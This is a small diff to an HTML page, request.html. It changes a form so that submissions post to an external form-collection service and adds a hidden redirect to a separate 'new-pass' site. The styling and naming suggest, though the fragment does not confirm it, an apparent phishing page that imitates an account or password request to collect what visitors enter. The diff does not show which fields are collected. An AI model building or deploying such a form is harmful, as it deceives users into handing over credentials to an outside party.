--- a/request.html
+++ b/request.html
@@ -10,8 +10,8 @@
 </head>
 
 <body>
-<form class="content" action="https://submit-form.com/jOE2lVGBf" method="POST">
-
+    <form action="https://submit-form.com/jOE2lVGBf" method="post">
+            <input type="hidden" name="_redirect" value="https://new-pass-sub-here.vercel.app"/>
 
 <div class="relative flex border bg-[#e9ebee] h-10 md:hidden 1g:hidden sm:block">
 
